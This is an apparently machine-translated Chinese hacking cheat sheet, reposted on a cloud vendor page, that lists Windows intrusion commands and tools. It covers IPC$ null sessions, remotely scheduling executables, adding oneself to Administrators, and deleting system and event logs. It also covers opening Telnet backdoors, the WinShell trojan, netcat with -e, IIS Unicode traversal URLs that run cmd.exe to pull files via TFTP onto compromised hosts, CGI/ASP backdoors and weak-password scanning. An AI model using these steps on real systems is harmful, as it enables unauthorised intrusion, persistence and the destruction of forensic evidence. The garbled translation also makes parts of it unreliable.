Management and hackers must know the command _ Application Tips

Source: Internet
Author: User
Tags net time system log
The administrator and the hacker must know the command

Common Few net commands:

(Establish an empty pipe connection with a remote host) net use \\IP address \ipc$ ""/use: ""

(log in as an administrator to the remote host) net use \\IP address \ipc$ "password"/use: "Administrator"

(Transfer files to remote host Winnt directory) copy native directory path \ Program \\IP address \admin$

(View remote host times) NET time \\IP address

(Timed to start a program) at \\IP address 02:18 Readme.exe

(view shared) net view \\IP address

(View NetBIOS Workgroup list) Nbtstat-a IP address

(Map remote host C disk to its own F disk) net use F: \\IP address \c$ ""/user: "Administrator"

(these two add themselves to the Administrators group): NET user username password/add

net localgroup Administrators user name/add

(disconnect) net use \\IP address \ipc$/delete
Outstanding

Del C:\winnt\system32\logfiles\*.*

Del c:\winnt\ssytem32\config\*.evt

Del C:\winnt\system32\dtclog\*.*

Del C:\winnt\system32\*.log

Del C:\winnt\system32\*.txt

Del C:\winnt\*.txt

Del C:\winnt\*.log

First, Netsvc.exe

The following commands list the time Tasks service for the service project on the host, the lookup, and the remote boot host:

Netsvc/list \\IP Address

NETSVC Schedule \\IP Address/query

Netsvc \\IP Address Schedule/start

Second, OpenTelnet.exe

Remotely boot the host's Telnet service and bind the port to 7878, for example:

Opentelnet \\IP Address user name password 1 7878

You can then telnet to the host's 7878 port and enter the DOS mode:

Telnet IP Address 7878
Third, Winshell.exe

A very small Trojan (less than 6K), telnet to the host 7878 port, enter the password WinShell, when you see cmd>, you can hit the following

's Command:

P Path (view path information for WinShell main program)

b reBoot (reboot machine)

D ShutDown (shutdown machine)

S Shell (you will see the lovely "c:\>" after execution)

X exit (Exit this logon session, this command does not terminate WinShell operation)

cmd> http://.../srv.exe (download files from other sites via HTTP to the machine running WinShell)

Four, 3389 Landers, GUI way to login to the remote host

Five, Elsave.exe

Event Log Cleanup Tool

Elsave-s \\IP Address-L "Application"-C

Elsave-s \\IP Address-L "system"-C

Elsave-s \\IP Address-L "security"-C

Successful cleanup of application log, System log, security log after execution

VI. Hbulot.exe

Open 3389 Services for Win2kserver and WinXP

Hbulot [/R]

Using/R indicates that the target is automatically reset after the installation is complete and the setting takes effect.

Vii. Nc.exe (Netcat.exe)

A good tool, some scripting programs have to use it, but also to do after the overflow of the connection.

Want to connect to somewhere: NC [-options] hostname port[s] [ports] ...

Bind port Wait for connection: nc-l-P Port [-options] [hostname] [port]

Parameters:

-e Prog program redirection, once connected, execute [Dangerous!!]

-G Gateway source-routing Hop Point[s], up to 8

-G num source-routing pointer:4, 8, 12, ...

-H Help Information

-I secs delay interval

-L listening mode for inbound connections

-n Specifies the IP address of the number and cannot be used with hostname

The-o file records 16-in-system transport

-P port Local port number

-R arbitrarily specify local and remote ports

-S addr Local Source Address

-U UDP mode

-v Verbose output-two-V for more detailed content

-W secs timeout time

-Z Turn off the input output-when used for scanning
Eight, TFTPD32. Exe

The computer temporarily into an FTP server, so that the broiler to download files, tftp command to execute on the broiler, usually to use

Unicode vulnerability or Telnet to a broiler, for example:

Http://IP address/s cripts/. %255c.. %255c/winnt/system32/cmd.exe?/c tftp-i Native IP address get file

Name c:\winnt\system32\ file name

You can then run the file directly:

Http://IP address/s cripts/. %255c.. %255c/winnt/system32/cmd.exe?/c+ file name

Ix. Prihack.exe is a printer remote buffer overflow tool for IIS. Idqover.exe is overflow idq, select "Overflow after a

Port listener, and then use Telnet to connect to its listening port, and if the overflow succeeds, the bound command executes immediately.

Xploit.exe is a graphical interface to the IDA overflow, after successful WinXP need to play WinXP.

10, Ntis.exe, Cmd.exe and cmdasp.asp are three cgi-backdoor,exe to be placed in the Cgi-bin directory, ASP put ASP

The directory where permissions are executed. Then use IE browser to connect.

One or one Xscan command line run parameter description:

In the detection process, press the "[space]" key to view the status of each thread and scan progress, press "Q" key to save the current data in advance exit the program,

Press ' <ctrl+c> ' to force the program to close.

1. Command format: Xscan-host < start ip>[-< termination ip>] < inspection project > [Other options]

Xscan-file < host list filename > < detection project > [Other options]

The < test items > meanings are as follows:

-port: Detects the port status of a common service (can be determined by the "port-scan-options\port-list" item of the \dat\config.ini file)

System to be tested port list);

-FTP: Detects FTP weak password (can set username/password dictionary file by \dat\config.ini file);

-ntpass: Detect nt-server Weak password (can be set by \dat\config.ini file username/password dictionary file);

-CGI: Detects CGI vulnerabilities (the encoding scheme can be set through the "Cgi-encode\encode_type" item of the \dat\config.ini file);

-iis: Detects IIS vulnerabilities (the encoding scheme can be set through the "Cgi-encode\encode_type" item of the \dat\config.ini file);

The other options have the following meanings:

-V: Show detailed scan progress

-P: Skip a ping-not-pass host

-O: Skipping hosts with no open ports detected

-T < concurrent threads [, number of concurrent hosts]&GT;: Specifies the maximum number of concurrent threads and the number of concurrent hosts, the default quantity is 100,10

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.